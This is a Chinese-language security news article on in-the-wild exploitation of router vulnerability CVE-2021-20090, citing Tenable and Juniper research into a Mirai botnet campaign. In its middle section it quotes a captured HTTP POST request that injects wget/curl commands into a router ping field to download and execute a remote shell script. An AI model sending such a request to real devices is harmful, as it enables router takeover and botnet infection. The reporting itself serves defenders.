研究人員發(fā)現(xiàn)9.9分漏洞在野利用，數(shù)百萬路由器設(shè)備受到影響。

　　CVE-2021-20090漏洞

　　CVE-2021-20090漏洞是Tenable研究人員8月3日公開的包含Arcadyan固件的路由器web接口路徑遍歷漏洞，CVSS評(píng)分9.9分。漏洞影響數(shù)百萬家用路由器設(shè)備和其他使用有漏洞的代碼庫的物聯(lián)網(wǎng)設(shè)備，包括部分互聯(lián)網(wǎng)服務(wù)提供商在內(nèi)的不少于17家廠商的產(chǎn)品受到影響。

　　CVE-2021-20090漏洞是一個(gè)路徑遍歷漏洞，可能引發(fā)認(rèn)證繞過。成功利用該漏洞后，攻擊者可以完全接管有漏洞的設(shè)備。比如，Tenable研究人員已經(jīng)證明了如何在有漏洞的路由器上修改配置以啟用Telnet，并獲取訪問設(shè)備的root級(jí)shell訪問權(quán)限。

　　cve-2021-20090漏洞的技術(shù)細(xì)節(jié)參見：

　　https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2

　　在野漏洞利用

　　Juniper安全研究人員在監(jiān)控一起惡意網(wǎng)絡(luò)活動(dòng)流量時(shí)發(fā)現(xiàn)嘗試?yán)迷撀┒吹墓裟Ｊ健９粽呖此茋L試在受影響的路由器上使用腳本的方式來部署Mirai惡意軟件變種。

　　研究人員從今年2月18日開始監(jiān)控到該攻擊活動(dòng)，原始的攻擊來源與IP地址27.22.80[.]19，通過HTTP POST方法：

　　POST /images/%2fapply_abstract.cgi HTTP/1.1

　　Connection: close

　　User-Agent: Darkaction=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A

　　wget+http://212.192.241.72/lolol.sh;

　　curl+-O+http://212.192.241.72/lolol.sh;

　　chmod+777+lolol.sh;

　　sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

　　從該P(yáng)OST 請求中可以看出，攻擊者修改了被攻擊設(shè)備的配置信息使用“ARC_SYS_TelnetdEnable=1”來啟用Telnet，然后使用wget或curl從IP 地址212.192.241[.]72 處下載一個(gè)新的腳本，然后執(zhí)行。研究人員分析該腳本payload并確認(rèn)是Mirai僵尸網(wǎng)絡(luò)變種。

　　從6月6日到7月23日，研究人員發(fā)現(xiàn)攻擊者開始利用其它的漏洞：

　　CVE-2020-29557 （DLink路由器）

　　CVE-2021-1497 and CVE-2021-1498 （Cisco HyperFlex）

　　CVE-2021-31755  （Tenda AC11）

　　CVE-2021-22502 （MicroFocus OBR）

　　CVE-2021-22506 （MicroFocus AM）

　　這表明該攻擊組織正通過添加新的漏洞利用不斷擴(kuò)展其攻擊活動(dòng)。